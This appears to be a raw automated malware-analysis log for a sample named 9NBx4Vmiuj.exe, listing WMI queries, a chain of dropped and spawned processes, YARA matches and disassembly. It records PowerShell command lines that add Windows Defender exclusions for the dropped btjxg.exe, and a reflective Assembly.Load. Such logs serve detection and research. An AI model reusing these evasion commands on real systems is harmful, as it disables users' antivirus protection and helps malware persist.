Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: unknown	Process created: C:\Users\user\Desktop\9NBx4Vmiuj.exe "C:\Users\user\Desktop\9NBx4Vmiuj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\btjxg.exe "C:\Users\user\AppData\Local\Temp\btjxg.exe"
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'btjxg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\btjxg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\btjxg.exe "C:\Users\user\AppData\Local\Temp\btjxg.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'btjxg.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\btjxg.exe'	Jump to behavior

Source: 9NBx4Vmiuj.exe, Program.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Source: Yara match	File source: 2.2.TypeId.exe.2184e8f82a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TypeId.exe.2184e7e01f8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c98201f8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.20937378268.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TypeId.exe.2184e858268.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.20937328230.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c98201f8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.209374182a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.20926dfd5f0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cfb01f8.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TypeId.exe.2184e7e01f8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TypeId.exe.2184e808230.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c9898268.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c99382a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c9848230.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cfd8230.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.209373001f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.20937328230.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TypeId.exe.2184e808230.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c9848230.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.209373001f8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2341c890000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cfd8230.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342d0c82a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cfb01f8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.20926dfd5f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2610110087.0000020937418000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2126079355.000002341C890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2158779274.000002184E8F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2610110087.0000020937300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3409147293.000001E3C9938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3376937115.000001E3B9201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2126196926.000002341C991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3409147293.000001E3C9848000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3409147293.000001E3C9898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2158779274.000002184E858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2610110087.0000020937378000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2158779274.000002184E7E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2610110087.0000020937328000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2158779274.000002184E808000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3409147293.000001E3C9820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9NBx4Vmiuj.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TypeId.exe PID: 1248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TypeId.exe PID: 7224, type: MEMORYSTR

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C197F push ecx; ret	0_2_00007FF8489C1980
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C09F5 push edx; ret	0_2_00007FF8489C09F6
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BE9C3 push ecx; ret	0_2_00007FF8489BE9C4
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BF9C0 push ecx; ret	0_2_00007FF8489BF9C1
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C1936 push eax; ret	0_2_00007FF8489C1937
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BF12C push eax; ret	0_2_00007FF8489BF12D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BF974 push ecx; ret	0_2_00007FF8489BF975
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C0A9A push edx; ret	0_2_00007FF8489C0A9B
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B9A82 push ecx; ret	0_2_00007FF8489B9A84
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BFA97 push ecx; ret	0_2_00007FF8489BFA98
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BD294 push ecx; ret	0_2_00007FF8489BD295
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B0848 push ds; retf 5F4Dh	0_2_00007FF8489B5B0F
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BD226 push ecx; ret	0_2_00007FF8489BD227
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C0230 push ecx; ret	0_2_00007FF8489C0231
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C0A58 push edx; ret	0_2_00007FF8489C0A59
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B4A55 push ds; retf 5F4Dh	0_2_00007FF8489B5B0F
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C03B3 push ecx; ret	0_2_00007FF8489C03B4
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BCB96 push ecx; ret	0_2_00007FF8489BCB97
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BE3DB push edx; ret	0_2_00007FF8489BE3DC
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C03F1 push ecx; ret	0_2_00007FF8489C03F2
